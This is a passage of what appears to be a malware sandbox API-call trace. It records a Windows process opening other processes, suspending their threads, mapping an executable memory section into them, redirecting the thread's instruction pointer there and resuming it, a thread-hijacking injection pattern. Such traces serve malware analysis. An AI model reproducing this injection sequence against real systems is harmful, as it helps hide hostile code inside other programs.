[253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.380] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.380] NtClose (Handle=0xbc) returned 0x0 [0195.380] NtClose (Handle=0x104) returned 0x0 [0195.381] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x8a4, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0195.381] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.381] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.382] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.382] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.393] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x8d0) | out: ThreadHandle=0x19ea68*=0xbc) returned 0x0 [0195.393] NtSuspendThread (in: ThreadHandle=0xbc, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.394] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x2540000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.400] NtGetContextThread (in: ThreadHandle=0xbc, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x15f8b8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x15f860, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x15f844, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.402] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.402] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x164200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x165000) returned 0x0 [0195.417] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x164200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x920000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x165000) returned 0x0 [0195.443] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.454] NtClose (Handle=0x10c) returned 0x0 [0195.454] NtSetContextThread (ThreadHandle=0xbc, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x15f8b8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x15f860, Eip=0x9f1707, SegCs=0x23, EFlags=0x246, Esp=0x15f844, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.455] NtResumeThread (in: ThreadHandle=0xbc, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.455] NtClose (Handle=0x104) returned 0x0 [0195.455] NtClose (Handle=0xbc) returned 0x0 [0195.476] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x8e4, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0xbc) returned 0x0 [0195.476] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.476] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.477] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.477] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.492] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, 